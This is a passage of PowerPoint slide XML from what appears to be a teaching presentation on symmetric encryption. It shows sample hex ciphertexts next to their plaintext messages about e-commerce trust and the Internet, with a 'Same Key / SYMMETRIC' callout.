              <a:t>9a46894335be49f0b9cab28d755aaa9cd98571b275bbb0adb405e6931e856ca3e5e569edd135285482</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1400">
              <a:solidFill>
                <a:srgbClr val="993300"/>
              </a:solidFill>
              <a:latin typeface="Verdana"/>
              <a:ea typeface="Verdana"/>
              <a:cs typeface="Verdana"/>
              <a:sym typeface="Verdana"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l" defTabSz="1300480">
              <a:defRPr sz="2400">
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
                <a:sym typeface="Times New Roman"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:rPr sz="2200">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Verdana"/>
                <a:ea typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
                <a:sym typeface="Verdana"/>
              </a:rPr>
              <a:t>Message 1</a:t>
            </a:r>
            <a:endParaRPr sz="2200">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
              <a:latin typeface="Verdana"/>
              <a:ea typeface="Verdana"/>
              <a:cs typeface="Verdana"/>
              <a:sym typeface="Verdana"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="just" defTabSz="1300480">
              <a:defRPr sz="2400">
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
                <a:sym typeface="Times New Roman"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:rPr sz="1400">
                <a:latin typeface="Verdana"/>
                <a:ea typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
                <a:sym typeface="Verdana"/>
              </a:rPr>
              <a:t>Central to the growth of e-commerce and e-governance is the issue of trust in electronic environment.</a:t>
            </a:r>
            <a:endParaRPr sz="1400">
              <a:latin typeface="Verdana"/>
              <a:ea typeface="Verdana"/>
              <a:cs typeface="Verdana"/>
              <a:sym typeface="Verdana"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="759" name="Encrypted Message 2…"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7477759" y="4551679"/>
            <a:ext cx="5310295" cy="40543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just" defTabSz="1300480">
              <a:defRPr sz="2400">
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
                <a:sym typeface="Times New Roman"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:rPr sz="2200">
                <a:solidFill>
                  <a:srgbClr val="000066"/>
                </a:solidFill>
                <a:latin typeface="Verdana"/>
                <a:ea typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
                <a:sym typeface="Verdana"/>
              </a:rPr>
              <a:t>Encrypted Message 2</a:t>
            </a:r>
            <a:endParaRPr sz="2200">
              <a:solidFill>
                <a:srgbClr val="000066"/>
              </a:solidFill>
              <a:latin typeface="Verdana"/>
              <a:ea typeface="Verdana"/>
              <a:cs typeface="Verdana"/>
              <a:sym typeface="Verdana"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="just" defTabSz="1300480">
              <a:defRPr sz="2400">
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
                <a:sym typeface="Times New Roman"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:rPr b="1" sz="1400">
                <a:solidFill>
                  <a:srgbClr val="993300"/>
                </a:solidFill>
                <a:latin typeface="Verdana"/>
                <a:ea typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
                <a:sym typeface="Verdana"/>
              </a:rPr>
              <a:t>a520eecb61a770f947ca856cd675463f1c95a9a2b8d4e6a71f80830c87f5715f5f59334978dd7e97da0707b48a1138d77ced56feba2b467c398683c7dbeb86b854f120606a7ae1ed934f5703672adab0d7be66dccde1a763c736cb9001d0731d541106f50bb7e54240c40ba780b7a553bea570b99c9ab3df13d75f8ccfdddeaaf3a749fd1411</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1400">
              <a:solidFill>
                <a:srgbClr val="993300"/>
              </a:solidFill>
              <a:latin typeface="Verdana"/>
              <a:ea typeface="Verdana"/>
              <a:cs typeface="Verdana"/>
              <a:sym typeface="Verdana"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l" defTabSz="1300480">
              <a:defRPr sz="2400">
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
                <a:sym typeface="Times New Roman"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:rPr sz="2200">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Verdana"/>
                <a:ea typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
                <a:sym typeface="Verdana"/>
              </a:rPr>
              <a:t>Message 2</a:t>
            </a:r>
            <a:endParaRPr sz="2200">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
              <a:latin typeface="Verdana"/>
              <a:ea typeface="Verdana"/>
              <a:cs typeface="Verdana"/>
              <a:sym typeface="Verdana"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="just" defTabSz="1300480">
              <a:defRPr sz="2400">
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
                <a:sym typeface="Times New Roman"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:rPr sz="1400">
                <a:latin typeface="Verdana"/>
                <a:ea typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
                <a:sym typeface="Verdana"/>
              </a:rPr>
              <a:t>The Internet knows no geographical boundaries. It has redefined time and space.  Advances in computer and telecommunication technologies have led to the explosive growth of the Internet.  This in turn is affecting the methods of communication, work, study, education, interaction, leisure, health, governance, trade and commerce. </a:t>
            </a:r>
            <a:endParaRPr sz="1400">
              <a:latin typeface="Verdana"/>
              <a:ea typeface="Verdana"/>
              <a:cs typeface="Verdana"/>
              <a:sym typeface="Verdana"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="760" name="Line"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7586133" y="4226559"/>
            <a:ext cx="4985174" cy="1"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="12700">
            <a:solidFill>
              <a:srgbClr val="B2B2B2"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="65023" tIns="65023" rIns="65023" bIns="65023"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l" defTabSz="650240">
              <a:defRPr sz="1600">
                <a:latin typeface="Helvetica"/>
                <a:ea typeface="Helvetica"/>
                <a:cs typeface="Helvetica"/>
                <a:sym typeface="Helvetica"/>
              </a:defRPr>
            </a:pPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="764" name="Group"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="7044266" y="2384213"/>
            <a:ext cx="433495" cy="1380677"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="433493" cy="1380676"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="761" name="Shape"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="0" y="0"/>
              <a:ext cx="433494" cy="13806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1" y="0"/>
                    <a:pt x="0" y="3454"/>
                    <a:pt x="0" y="7714"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="0" y="12122"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="15392"/>
                    <a:pt x="5770" y="18306"/>
                    <a:pt x="14400" y="19396"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="14400" y="21600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="21600" y="17633"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="14400" y="12784"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="14400" y="14987"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="7890" y="14165"/>
                    <a:pt x="2873" y="12282"/>
                    <a:pt x="900" y="9918"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="900" y="9918"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="3630" y="6649"/>
                    <a:pt x="12048" y="4408"/>
                    <a:pt x="21600" y="4408"/>
                  </a:cubicBezTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:gradFill flip="none" rotWithShape="1">
              <a:gsLst>
                <a:gs pos="0">
                  <a:srgbClr val="3333CC"/>
                </a:gs>
                <a:gs pos="100000">
                  <a:srgbClr val="CC6600"/>
                </a:gs>
              </a:gsLst>
              <a:lin ang="16200000" scaled="0"/>
            </a:gradFill>
            <a:ln w="12700" cap="flat">
              <a:solidFill>
                <a:srgbClr val="000066"/>
              </a:solidFill>
              <a:prstDash val="solid"/>
              <a:round/>
            </a:ln>
            <a:effectLst/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" lIns="65023" tIns="65023" rIns="65023" bIns="65023" numCol="1" anchor="ctr">
              <a:noAutofit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="l" defTabSz="1300480">
                <a:defRPr sz="2400">
                  <a:latin typeface="Times New Roman"/>
                  <a:ea typeface="Times New Roman"/>
                  <a:cs typeface="Times New Roman"/>
                  <a:sym typeface="Times New Roman"/>
                </a:defRPr>
              </a:pPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="762" name="Shape"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="0" y="0"/>
              <a:ext cx="433494" cy="6339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1" y="0"/>
                    <a:pt x="0" y="7522"/>
                    <a:pt x="0" y="16800"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="18425"/>
                    <a:pt x="303" y="20042"/>
                    <a:pt x="900" y="21600"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="900" y="21600"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="3630" y="14480"/>
                    <a:pt x="12048" y="9600"/>
                    <a:pt x="21600" y="9600"/>
                  </a:cubicBezTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:srgbClr val="2929A3"/>
            </a:solidFill>
            <a:ln w="12700" cap="flat">
              <a:noFill/>
              <a:miter lim="400000"/>
            </a:ln>
            <a:effectLst/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" lIns="65023" tIns="65023" rIns="65023" bIns="65023" numCol="1" anchor="ctr">
              <a:noAutofit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="l" defTabSz="1300480">
                <a:defRPr sz="2400">
                  <a:latin typeface="Times New Roman"/>
                  <a:ea typeface="Times New Roman"/>
                  <a:cs typeface="Times New Roman"/>
                  <a:sym typeface="Times New Roman"/>
                </a:defRPr>
              </a:pPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="763" name="Line"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="0" y="493098"/>
              <a:ext cx="18070" cy="140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7315"/>
                    <a:pt x="7276" y="14590"/>
                    <a:pt x="21600" y="21600"/>
                  </a:cubicBezTo>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:noFill/>
            <a:ln w="12700" cap="flat">
              <a:solidFill>
                <a:srgbClr val="000066"/>
              </a:solidFill>
              <a:prstDash val="solid"/>
              <a:round/>
            </a:ln>
            <a:effectLst/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" lIns="65023" tIns="65023" rIns="65023" bIns="65023" numCol="1" anchor="ctr">
              <a:noAutofit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="l" defTabSz="1300480">
                <a:defRPr sz="2400">
                  <a:latin typeface="Times New Roman"/>
                  <a:ea typeface="Times New Roman"/>
                  <a:cs typeface="Times New Roman"/>
                  <a:sym typeface="Times New Roman"/>
                </a:defRPr>
              </a:pPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="765" name="C:\Documents and Settings\compaq\Application Data\Microsoft\Media Catalog\Downloaded Clips\cl0\BS00996_.wmf" descr="C:\Documents and Settings\compaq\Application Data\Microsoft\Media Catalog\Downloaded Clips\cl0\BS00996_.wmf"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5">
            <a:extLst/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6827519" y="2752231"/>
            <a:ext cx="559930" cy="390596"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="12700">
            <a:miter lim="400000"/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="769" name="Group"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="6827519" y="5418666"/>
            <a:ext cx="650241" cy="2548942"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="650240" cy="2548941"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="766" name="Shape"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="0" y="0"/>
              <a:ext cx="650241" cy="25489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1" y="0"/>
                    <a:pt x="0" y="3454"/>
                    <a:pt x="0" y="7714"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="0" y="12122"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="15392"/>
                    <a:pt x="5770" y="18306"/>
                    <a:pt x="14400" y="19396"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="14400" y="21600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="21600" y="17633"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="14400" y="12784"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="14400" y="14987"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="7890" y="14165"/>
                    <a:pt x="2873" y="12282"/>
                    <a:pt x="900" y="9918"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="900" y="9918"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="3630" y="6649"/>
                    <a:pt x="12048" y="4408"/>
                    <a:pt x="21600" y="4408"/>
                  </a:cubicBezTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:gradFill flip="none" rotWithShape="1">
              <a:gsLst>
                <a:gs pos="0">
                  <a:srgbClr val="3333CC"/>
                </a:gs>
                <a:gs pos="100000">
                  <a:srgbClr val="CC6600"/>
                </a:gs>
              </a:gsLst>
              <a:lin ang="16200000" scaled="0"/>
            </a:gradFill>
            <a:ln w="12700" cap="flat">
              <a:solidFill>
                <a:srgbClr val="000066"/>
              </a:solidFill>
              <a:prstDash val="solid"/>
              <a:round/>
            </a:ln>
            <a:effectLst/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" lIns="65023" tIns="65023" rIns="65023" bIns="65023" numCol="1" anchor="ctr">
              <a:noAutofit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="l" defTabSz="1300480">
                <a:defRPr sz="2400">
                  <a:latin typeface="Times New Roman"/>
                  <a:ea typeface="Times New Roman"/>
                  <a:cs typeface="Times New Roman"/>
                  <a:sym typeface="Times New Roman"/>
                </a:defRPr>
              </a:pPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="767" name="Shape"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="0" y="0"/>
              <a:ext cx="650241" cy="11704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1" y="0"/>
                    <a:pt x="0" y="7522"/>
                    <a:pt x="0" y="16800"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="18425"/>
                    <a:pt x="303" y="20042"/>
                    <a:pt x="900" y="21600"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="900" y="21600"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="3630" y="14480"/>
                    <a:pt x="12048" y="9600"/>
                    <a:pt x="21600" y="9600"/>
                  </a:cubicBezTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:srgbClr val="2929A3"/>
            </a:solidFill>
            <a:ln w="12700" cap="flat">
              <a:noFill/>
              <a:miter lim="400000"/>
            </a:ln>
            <a:effectLst/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" lIns="65023" tIns="65023" rIns="65023" bIns="65023" numCol="1" anchor="ctr">
              <a:noAutofit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="l" defTabSz="1300480">
                <a:defRPr sz="2400">
                  <a:latin typeface="Times New Roman"/>
                  <a:ea typeface="Times New Roman"/>
                  <a:cs typeface="Times New Roman"/>
                  <a:sym typeface="Times New Roman"/>
                </a:defRPr>
              </a:pPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="768" name="Line"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="0" y="910336"/>
              <a:ext cx="27105" cy="260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7315"/>
                    <a:pt x="7276" y="14590"/>
                    <a:pt x="21600" y="21600"/>
                  </a:cubicBezTo>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:noFill/>
            <a:ln w="12700" cap="flat">
              <a:solidFill>
                <a:srgbClr val="000066"/>
              </a:solidFill>
              <a:prstDash val="solid"/>
              <a:round/>
            </a:ln>
            <a:effectLst/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" lIns="65023" tIns="65023" rIns="65023" bIns="65023" numCol="1" anchor="ctr">
              <a:noAutofit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="l" defTabSz="1300480">
                <a:defRPr sz="2400">
                  <a:latin typeface="Times New Roman"/>
                  <a:ea typeface="Times New Roman"/>
                  <a:cs typeface="Times New Roman"/>
                  <a:sym typeface="Times New Roman"/>
                </a:defRPr>
              </a:pPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="770" name="A:\BS00768_.wmf" descr="A:\BS00768_.wmf"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId6">
            <a:extLst/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6502400" y="6285653"/>
            <a:ext cx="767645" cy="417690"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="12700">
            <a:miter lim="400000"/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="771" name="A:\BS00714_.wmf" descr="A:\BS00714_.wmf"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId7">
            <a:extLst/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="11160195" y="975359"/>
            <a:ext cx="977619" cy="1192108"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="12700">
            <a:miter lim="400000"/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="776" name="Group"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="3251200" y="3793066"/>
            <a:ext cx="3793067" cy="1300481"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="3793066" cy="1300480"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="772" name="Quote Bubble"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm rot="10800000">
              <a:off x="0" y="-1"/>
              <a:ext cx="3793067" cy="1300482"/>
            </a:xfrm>
            <a:prstGeom prst="wedgeEllipseCallout">
              <a:avLst>
                <a:gd name="adj1" fmla="val -43991"/>
                <a:gd name="adj2" fmla="val 101213"/>
              </a:avLst>
            </a:prstGeom>
            <a:gradFill flip="none" rotWithShape="1">
              <a:gsLst>
                <a:gs pos="0">
                  <a:srgbClr val="993300"/>
                </a:gs>
                <a:gs pos="100000">
                  <a:srgbClr val="3333CC"/>
                </a:gs>
              </a:gsLst>
              <a:lin ang="16200000" scaled="0"/>
            </a:gradFill>
            <a:ln w="12700" cap="flat">
              <a:noFill/>
              <a:miter lim="400000"/>
            </a:ln>
            <a:effectLst/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" lIns="65023" tIns="65023" rIns="65023" bIns="65023" numCol="1" anchor="ctr">
              <a:noAutofit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr defTabSz="1300480">
                <a:defRPr sz="2200">
                  <a:solidFill>
                    <a:srgbClr val="FF9900"/>
                  </a:solidFill>
                  <a:latin typeface="Verdana"/>
                  <a:ea typeface="Verdana"/>
                  <a:cs typeface="Verdana"/>
                  <a:sym typeface="Verdana"/>
                </a:defRPr>
              </a:pPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="775" name="Group"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="0" y="-1"/>
              <a:ext cx="3793067" cy="1300482"/>
              <a:chOff x="0" y="0"/>
              <a:chExt cx="3793066" cy="1300480"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="773" name="Quote Bubble"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm rot="10800000">
                <a:off x="0" y="0"/>
                <a:ext cx="3793067" cy="1300481"/>
              </a:xfrm>
              <a:prstGeom prst="wedgeEllipseCallout">
                <a:avLst>
                  <a:gd name="adj1" fmla="val 104106"/>
                  <a:gd name="adj2" fmla="val 106769"/>
                </a:avLst>
              </a:prstGeom>
              <a:gradFill flip="none" rotWithShape="1">
                <a:gsLst>
                  <a:gs pos="0">
                    <a:srgbClr val="993300"/>
                  </a:gs>
                  <a:gs pos="100000">
                    <a:srgbClr val="3333CC"/>
                  </a:gs>
                </a:gsLst>
                <a:lin ang="16200000" scaled="0"/>
              </a:gradFill>
              <a:ln w="12700" cap="flat">
                <a:noFill/>
                <a:miter lim="400000"/>
              </a:ln>
              <a:effectLst/>
            </p:spPr>
            <p:txBody>
              <a:bodyPr wrap="square" lIns="65023" tIns="65023" rIns="65023" bIns="65023" numCol="1" anchor="ctr">
                <a:noAutofit/>
              </a:bodyPr>
              <a:lstStyle/>
              <a:p>
                <a:pPr defTabSz="1300480">
                  <a:defRPr sz="2800">
                    <a:solidFill>
                      <a:srgbClr val="FFFFFF"/>
                    </a:solidFill>
                    <a:latin typeface="Verdana"/>
                    <a:ea typeface="Verdana"/>
                    <a:cs typeface="Verdana"/>
                    <a:sym typeface="Verdana"/>
                  </a:defRPr>
                </a:pPr>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="774" name="Same Key…"/>
              <p:cNvSpPr txBox="1"/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="555438" y="197866"/>
                <a:ext cx="2682191" cy="904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defTabSz="1300480">
                  <a:defRPr sz="2400">
                    <a:latin typeface="Times New Roman"/>
                    <a:ea typeface="Times New Roman"/>
                    <a:cs typeface="Times New Roman"/>
                    <a:sym typeface="Times New Roman"/>
                  </a:defRPr>
                </a:pPr>
                <a:r>
                  <a:rPr sz="2200">
                    <a:solidFill>
                      <a:srgbClr val="FFFF66"/>
                    </a:solidFill>
                    <a:latin typeface="Verdana"/>
                    <a:ea typeface="Verdana"/>
                    <a:cs typeface="Verdana"/>
                    <a:sym typeface="Verdana"/>
                  </a:rPr>
                  <a:t>Same Key</a:t>
                </a:r>
                <a:endParaRPr sz="2200">
                  <a:solidFill>
                    <a:srgbClr val="FFFF66"/>
                  </a:solidFill>
                  <a:latin typeface="Verdana"/>
                  <a:ea typeface="Verdana"/>
                  <a:cs typeface="Verdana"/>
                  <a:sym typeface="Verdana"/>
                </a:endParaRPr>
              </a:p>
              <a:p>
                <a:pPr defTabSz="1300480">
                  <a:defRPr sz="2400">
                    <a:latin typeface="Times New Roman"/>
                    <a:ea typeface="Times New Roman"/>
                    <a:cs typeface="Times New Roman"/>
                    <a:sym typeface="Times New Roman"/>
                  </a:defRPr>
                </a:pPr>
                <a:r>
                  <a:rPr sz="2800">
                    <a:solidFill>
                      <a:srgbClr val="FFFFFF"/>
                    </a:solidFill>
                    <a:latin typeface="Verdana"/>
                    <a:ea typeface="Verdana"/>
                    <a:cs typeface="Verdana"/>
                    <a:sym typeface="Verdana"/>
                  </a:rPr>
                  <a:t>SYMMETRIC</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
        </p:grpSp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="781" name="Group"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1083733" y="7261013"/>
            <a:ext cx="6068907" cy="2059094"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="6068906" cy="2059093"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="779" name="Group"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="0" y="0"/>
              <a:ext cx="6068907" cy="2059094"/>
              <a:chOff x="0" y="0"/>
              <a:chExt cx="6068906" cy="2059093"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="777" name="Quote Bubble"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="0" y="0"/>
                <a:ext cx="6068907" cy="2059094"/>
              </a:xfrm>
              <a:prstGeom prst="wedgeEllipseCallout">
                <a:avLst>
                  <a:gd name="adj1" fmla="val -50296"/>
                  <a:gd name="adj2" fmla="val -88815"/>
                </a:avLst>
              </a:prstGeom>
              <a:gradFill flip="none" rotWithShape="1">
                <a:gsLst>
                  <a:gs pos="0">
                    <a:srgbClr val="3333CC"/>
                  </a:gs>
                  <a:gs pos="100000">
                    <a:srgbClr val="CC6600"/>
                  </a:gs>
                </a:gsLst>
                <a:lin ang="16200000" scaled="0"/>
              </a:gradFill>
              <a:ln w="12700" cap="flat">
                <a:noFill/>
                <a:miter lim="400000"/>
              </a:ln>
              <a:effectLst/>
            </p:spPr>
            <p:txBody>
              <a:bodyPr wrap="square" lIns="65023" tIns="65023" rIns="65023" bIns="65023" numCol="1" anchor="ctr">
                <a:noAutofit/>
              </a:bodyPr>
              <a:lstStyle/>
              <a:p>
                <a:pPr defTabSz="1300480">
                  <a:defRPr sz="2200">
                    <a:solidFill>
                      <a:srgbClr val="FF9900"/>
                    </a:solidFill>
                    <a:latin typeface="Verdana"/>
                    <a:ea typeface="Verdana"/>
                    <a:cs typeface="Verdana"/>
